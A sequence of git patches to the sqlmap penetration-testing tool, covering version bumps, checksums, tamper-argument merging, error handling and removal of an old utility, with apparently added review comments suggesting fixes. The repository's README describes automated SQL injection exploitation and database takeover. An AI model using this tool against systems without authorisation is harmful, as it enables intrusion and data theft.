a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.36" +VERSION = "1.2.9.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1b7e6ac5319..3ee4c81936d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -ba0f924d43ff1e41f070afb003ed0aaa lib/controller/checks.py +61b66a7c30eb43c6b99ad57e4a8b5b22 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fe3d03cf236257200f3d373babfe54d5 lib/core/settings.py +d19e57fe2d2830703117b44a57f5922a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From f4a0820dcb5fded8bc4d0363c91276eb9a3445ae Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 24 Sep 2018 14:00:58 +0200 Subject: [PATCH 298/428] Merging of tamper script arguments (e.g. --tamper A --tamper B -> --tamper=A,B) --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 7 +++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d442b0957eb..1b01c8efc1e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.37" +VERSION = "1.2.9.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b6a46c0b3d4..86faefd9b56 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -753,6 +753,7 @@ def _(self, *args): prompt = False advancedHelp = True extraHeaders = [] + tamperIndex = None # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") for arg in argv: @@ -824,6 +825,12 @@ def _(self, *args): elif re.search(r"\A-\w=.+", argv[i]): dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i]) raise SystemExit + elif argv[i].startswith("--tamper"): + if tamperIndex is None: + tamperIndex = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None) + else: + argv[tamperIndex] = "%s,%s" % (argv[tamperIndex], argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else "")) + argv[i] = "" elif argv[i] == "-H": if i + 1 < len(argv): extraHeaders.append(argv[i + 1]) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3ee4c81936d..e204e090f85 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
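Review bot: The merge branch of the new `--tamper` handling has two gaps: `argv[i].split('=')[1]` discards everything after a second `=`, so a value containing `=` is truncated (use `split('=', 1)[1]`), and when a later occurrence uses the space-separated form its value token `argv[i + 1]` is merged but never blanked, so after `argv[i] = ""` it survives as a stray positional argument. A later occurrence with no value at all also appends an empty string and leaves a trailing comma. The rewrite below resolves the value and its index once, merges only non-empty values and clears the consumed token; I assume empty `argv` entries are filtered before option parsing, since the hunk already introduces them. The enclosing `for` loop and the function `_` start before the hunk.
```python
                elif argv[i].startswith("--tamper"):
                    if '=' in argv[i]:
                        valueIndex, value = None, argv[i].split('=', 1)[1]
                    elif i + 1 < len(argv) and not argv[i + 1].startswith('-'):
                        valueIndex, value = i + 1, argv[i + 1]
                    else:
                        valueIndex, value = None, ""

                    if tamperIndex is None:
                        tamperIndex = i if '=' in argv[i] else valueIndex
                    else:
                        if value:
                            argv[tamperIndex] = "%s,%s" % (argv[tamperIndex], value)
                        argv[i] = ""
                        if valueIndex is not None:
                            argv[valueIndex] = ""  # consumed value must not remain as a stray positional
                # … unchanged: "-H" handling and the remaining option checks …
```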
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d19e57fe2d2830703117b44a57f5922a lib/core/settings.py +9f3052dd8ab94a3429f356d40dc263c1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -61,7 +61,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -134bbbf67bb30c188b8409c0b3bfbc2a lib/parse/cmdline.py +4296aee13e84a7394f2329dc7ea542ef lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 68a83098abfb25b8c4d7e975643b01f693cc11c9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 25 Sep 2018 14:06:32 +0200 Subject: [PATCH 299/428] Update of THANKS (based on 2017 donation) --- doc/THANKS.md | 1 + lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/doc/THANKS.md b/doc/THANKS.md index 6e9f85819ef..94a32b480d0 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -597,6 +597,7 @@ Carlos Gabriel Vergara, Patrick Webster, * for suggesting an enhancement +* for donating to sqlmap development (from OSI.Security) Ed Williams, * for suggesting a minor enhancement diff --git a/lib/core/settings.py b/lib/core/settings.py index 1b01c8efc1e..16385595266 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.38" +VERSION = "1.2.9.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e204e090f85..4480216f9a3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9f3052dd8ab94a3429f356d40dc263c1 lib/core/settings.py +bae340b4a0f79271c0690deff7d849a1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 3b369920a1c43cac583e51683960a72f148b22f2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 26 Sep 2018 15:33:34 +0200 Subject: [PATCH 300/428] Minor patch related to the #3257 --- lib/core/settings.py | 2 +- lib/core/threads.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 16385595266..a855f3eb074 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.39" +VERSION = "1.2.9.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/core/threads.py b/lib/core/threads.py
index a0bf58e3738..c6588dd1101 100644
--- a/lib/core/threads.py
+++ b/lib/core/threads.py
@@ -95,7 +95,7 @@ def exceptionHandledFunction(threadFunction, silent=False):
 if not silent:
 logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
- if conf.verbose > 1:
+ if conf.get("verbose") > 1:
 traceback.print_exc()
 def setDaemon(thread):
@@ -189,7 +189,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
 kb.threadException = True
 logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
- if conf.verbose > 1:
+ if conf.get("verbose") > 1:
 traceback.print_exc()
 except:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 4480216f9a3..5ee23611fae 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -50,12 +50,12 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-bae340b4a0f79271c0690deff7d849a1 lib/core/settings.py
+495854418b62c5ad47ae1eb0ac891976 lib/core/settings.py
 dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 62bc180e3e828949ffb342a8f756c183 lib/core/target.py
 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py
-e896992e4db26605ab1e73615b1f9434 lib/core/threads.py
+29efb66f3c444c09d29925cf552851cd lib/core/threads.py
 c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py
 b35636650cfe721f5cc47fb91737c061 lib/core/update.py
 e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py
From 71208e891c856552ac1b6abfd01189fb35a771b7 Mon Sep 17 00:00:00 2001
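Review bot: `conf.get("verbose") > 1` on the changed line relies on Python 2 ordering `None` below every integer, so an unset `verbose` is silently treated as "not verbose" here but the same expression raises `TypeError` on Python 3. Spelling the intent out as `if (conf.get("verbose") or 0) > 1:` keeps the guard explicit and portable. The second hunk in `runThreads` has the identical pattern and should get the same treatment; both enclosing functions start outside their hunks.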
From: Miroslav Stampar Date: Thu, 27 Sep 2018 09:15:53 +0200 Subject: [PATCH 301/428] Update regarding #3258 --- lib/core/settings.py | 2 +- lib/utils/versioncheck.py | 3 +- sqlmap.py | 64 +++++++++++++++++++++------------------ txt/checksum.md5 | 6 ++-- 4 files changed, 40 insertions(+), 35 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a855f3eb074..355459dd108 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.40" +VERSION = "1.2.9.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index f57ea0682e8..c78b6954506 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -6,11 +6,12 @@ """ import sys +import time PYVERSION = sys.version.split()[0] if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) + exit("[%s] [CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % (time.strftime("%X"), PYVERSION)) errors = [] extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib") diff --git a/sqlmap.py b/sqlmap.py index f64e5e9ff84..31410a11fd8 100755 --- a/sqlmap.py +++ b/sqlmap.py 
@@ -5,37 +5,37 @@ See the file 'LICENSE' for copying permission
 """
-import sys
+try:
+ import sys
-sys.dont_write_bytecode = True
+ sys.dont_write_bytecode = True
-try:
- __import__("lib.utils.versioncheck") # this has to be the first non-standard import
-except ImportError:
- exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
-
-import bdb
-import distutils
-import glob
-import inspect
-import json
-import logging
-import os
-import re
-import shutil
-import sys
-import thread
-import threading
-import time
-import traceback
-import warnings
-
-warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
-warnings.filterwarnings(action="ignore", category=DeprecationWarning)
-
-from lib.core.data import logger
+ try:
+ __import__("lib.utils.versioncheck") # this has to be the first non-standard import
+ except ImportError:
+ exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
+
+ import bdb
+ import distutils
+ import glob
+ import inspect
+ import json
+ import logging
+ import os
+ import re
+ import shutil
+ import sys
+ import thread
+ import threading
+ import time
+ import traceback
+ import warnings
+
+ warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
+ warnings.filterwarnings(action="ignore", category=DeprecationWarning)
+
+ from lib.core.data import logger
-try:
 from lib.core.common import banner
 from lib.core.common import checkIntegrity
 from lib.core.common import createGithubIssue
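Review bot: `import sys` now appears twice inside the new `try:` block (as its first statement and again in the alphabetical list), a leftover of the old top-level layout that the re-indent carried over; the second one can go. The `exit(...)` in the `except ImportError:` branch is the `site`-module builtin, which is not defined when the interpreter runs with `-S`; since `sys` is the first thing imported in the block, `sys.exit(...)` is the dependable spelling. The `try:` block continues past the end of the hunk.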
@@ -67,9 +67,13 @@ from lib.parse.cmdline import cmdLineParser
 except KeyboardInterrupt:
 errMsg = "user aborted"
- logger.error(errMsg)
- raise SystemExit
+ if "logger" in globals():
+ logger.error(errMsg)
+ raise SystemExit
+ else:
+ import time
+ exit("\r[%s] [ERROR] %s" % (time.strftime("%X"), errMsg))
 def modulePath():
 """
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 5ee23611fae..6abbdd545a5 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-495854418b62c5ad47ae1eb0ac891976 lib/core/settings.py
+59274b9acea517616aed86e58808e02d lib/core/settings.py
 dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 62bc180e3e828949ffb342a8f756c183 lib/core/target.py
@@ -118,7 +118,7 @@ d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py
 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py
 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py
 dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py
-faa7536c4788ee118b19338f3e98e556 lib/utils/versioncheck.py
+4703ceeb32131a9a7a6561575644123b lib/utils/versioncheck.py
 e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py
 b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py
 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py
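Review bot: The two branches of the new `except KeyboardInterrupt:` handler exit with different statuses for the same "user aborted" condition: `raise SystemExit` with no argument exits with 0, whereas `exit("\r[%s] [ERROR] %s" % ...)` prints to stderr and exits with 1, so a wrapper keying on the exit code cannot distinguish an abort from success in the first branch. `raise SystemExit(1)` in the `if` branch would make both paths agree. The enclosing `try`/`except` starts outside the hunk.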
@@ -228,7 +228,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_
 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_
 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_
 cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py
-a35b5b83c12841fdf3925190c9d24299 sqlmap.py
+5f30815ebe320e46e5898dc819e629a7 sqlmap.py
 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py
 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py
 d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py
From 932aa8dd94ce5e2f8cd473ac0f32f34d915e22d8 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Fri, 28 Sep 2018 13:12:21 +0200
Subject: [PATCH 302/428] Fixes #3262
---
 lib/core/bigarray.py | 2 +-
 lib/core/settings.py | 2 +-
 txt/checksum.md5 | 4 ++--
 3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index f12d23148dd..b99c6f98074 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -126,7 +126,7 @@ def _checkcache(self, index):
 try:
 with open(self.chunks[index], "rb") as f:
 self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False)
- except IOError, ex:
+ except Exception, ex:
 errMsg = "exception occurred while retrieving data "
 errMsg += "from a temporary file ('%s')" % ex.message
 raise SqlmapSystemException(errMsg)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 355459dd108..c87a02653a5 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.9.41"
+VERSION = "1.2.9.42"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 6abbdd545a5..cb5a6e1a088 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
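Review bot: Widening `except IOError, ex:` to `except Exception, ex:` in `_checkcache` now also wraps `bz2`/`pickle` decoding failures, but the message on the next context line is built from `ex.message`, which is empty for many Python 2 exception types (any raised with more than one argument) and deprecated since 2.6, so the `SqlmapSystemException` can lose the actual cause; `getattr(ex, "message", None) or str(ex)` keeps the detail. Separately, the guarded line hands a file read from disk straight to `pickle.loads`, which trusts the stream to name only safe callables; that holds only while the chunk files in `self.chunks` sit in a directory no other local user can write to, and a comment such as `# chunk files are process-private temp files; pickle.loads must never see data from elsewhere` next to the call would record that assumption. `_checkcache` starts outside the hunk.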
@@ -29,7 +29,7 @@ c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py -fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py +c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py cbf9428039f52d8ee80fcf79b6583b7c lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -59274b9acea517616aed86e58808e02d lib/core/settings.py +987652d171b26820be98f557354bb5cf lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 065c5e8157d6a77ac33055868d007af28ccf06c5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 29 Sep 2018 23:10:03 +0200 Subject: [PATCH 303/428] Fixes #3264 --- lib/core/enums.py | 2 ++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/enums.py b/lib/core/enums.py index 96fceee99d9..ab21db6bdde 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -256,6 +256,7 @@ class PAYLOAD: 3: "LIKE single quoted string", 4: "Double quoted string", 5: "LIKE double quoted string", + 6: "Identifier (e.g. column name)", } RISK = { @@ -275,6 +276,7 @@ class PAYLOAD: 6: "TOP", 7: "Table name", 8: "Column name", + 9: "Pre-WHERE (non-query)", } class METHOD: diff --git a/lib/core/settings.py b/lib/core/settings.py index c87a02653a5..b92b94e2d0f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.42" +VERSION = "1.2.9.43" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cb5a6e1a088..8a3ee204033 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -38,7 +38,7 @@ cbf9428039f52d8ee80fcf79b6583b7c lib/core/common.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py 4d50e0f893477196d83608175d1a7de4 lib/core/dicts.py d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py -ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py +705fcf5b66cb4518a54e4d717c915968 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -987652d171b26820be98f557354bb5cf lib/core/settings.py +06e9273cc80dd4461dc5dc3518ca73a3 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 80af22435ad47e9dc8ad4209a8adda54afd8ee7b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 12:21:29 +0200 Subject: [PATCH 304/428] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0a724d40710..94555641904 100644 --- a/README.md +++ b/README.md 
@@ -4,7 +4,7 @@ sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. -**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).** +**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/scan-website-security-issues/?utm_source=sqlmap.org&utm_medium=banner&utm_campaign=github).** Screenshots ---- From 9182b90b2b9c50561856c651a110403c4932775f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 12:57:52 +0200 Subject: [PATCH 305/428] Removing an obsolete utility --- extra/mssqlsig/update.py | 137 --------------------------------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 +- 3 files changed, 2 insertions(+), 140 deletions(-) delete mode 100644 extra/mssqlsig/update.py diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py deleted file mode 100644 index 84b94c54ee1..00000000000 --- a/extra/mssqlsig/update.py +++ /dev/null 
@@ -1,137 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -import codecs -import os -import re -import urllib2 -import urlparse - -from xml.dom.minidom import Document - -# Path to the XML file with signatures -MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml") - -# Url to update Microsoft SQL Server XML versions file from -MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx" - -def updateMSSQLXML(): - if not os.path.exists(MSSQL_XML): - errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML - print errMsg - return - - infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL - print infoMsg - - try: - req = urllib2.Request(MSSQL_VERSIONS_URL) - f = urllib2.urlopen(req) - mssqlVersionsHtmlString = f.read() - f.close() - except urllib2.URLError: - __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) - __mssqlHostname = __mssqlPath[1] - - warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname - warnMsg += " check your Internet connection and retry" - print warnMsg - - return - - releases = re.findall(r"class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I) - releasesCount = len(releases) - - # Create the minidom document - doc = Document() - - # Create the base element - root = doc.createElement("root") - doc.appendChild(root) - - for index in xrange(0, releasesCount): - release = releases[index] - - # Skip Microsoft SQL Server 6.5 because the HTML - # table is in another format - if release == "6.5": - continue - - # Create the base element - signatures = doc.createElement("signatures") - signatures.setAttribute("release", release) - root.appendChild(signatures) - - startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index]) - - if index == releasesCount - 1: - stopIdx 
= len(mssqlVersionsHtmlString) - else: - stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) - - mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall(r"
    [\r]*\n", mssqlVersionsReleaseString, re.I) - - for servicePack, version in servicepackVersion: - if servicePack.startswith(" "): - servicePack = servicePack[1:] - if "/" in servicePack: - servicePack = servicePack[:servicePack.index("/")] - if "(" in servicePack: - servicePack = servicePack[:servicePack.index("(")] - if "-" in servicePack: - servicePack = servicePack[:servicePack.index("-")] - if "*" in servicePack: - servicePack = servicePack[:servicePack.index("*")] - if servicePack.startswith("+"): - servicePack = "0%s" % servicePack - - servicePack = servicePack.replace("\t", " ") - servicePack = servicePack.replace("No SP", "0") - servicePack = servicePack.replace("RTM", "0") - servicePack = servicePack.replace("TM", "0") - servicePack = servicePack.replace("SP", "") - servicePack = servicePack.replace("Service Pack", "") - servicePack = servicePack.replace(" element - signature = doc.createElement("signature") - signatures.appendChild(signature) - - # Create a element - versionElement = doc.createElement("version") - signature.appendChild(versionElement) - - # Give the elemenet some text - versionText = doc.createTextNode(version) - versionElement.appendChild(versionText) - - # Create a element - servicepackElement = doc.createElement("servicepack") - signature.appendChild(servicepackElement) - - # Give the elemenet some text - servicepackText = doc.createTextNode(servicePack) - servicepackElement.appendChild(servicepackText) - - # Save our newly created XML to the signatures file - mssqlXml = codecs.open(MSSQL_XML, "w", "utf8") - doc.writexml(writer=mssqlXml, addindent=" ", newl="\n") - mssqlXml.close() - - infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML - print infoMsg - -if __name__ == "__main__": - updateMSSQLXML() diff --git a/lib/core/settings.py b/lib/core/settings.py index b92b94e2d0f..a7ca899dad6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
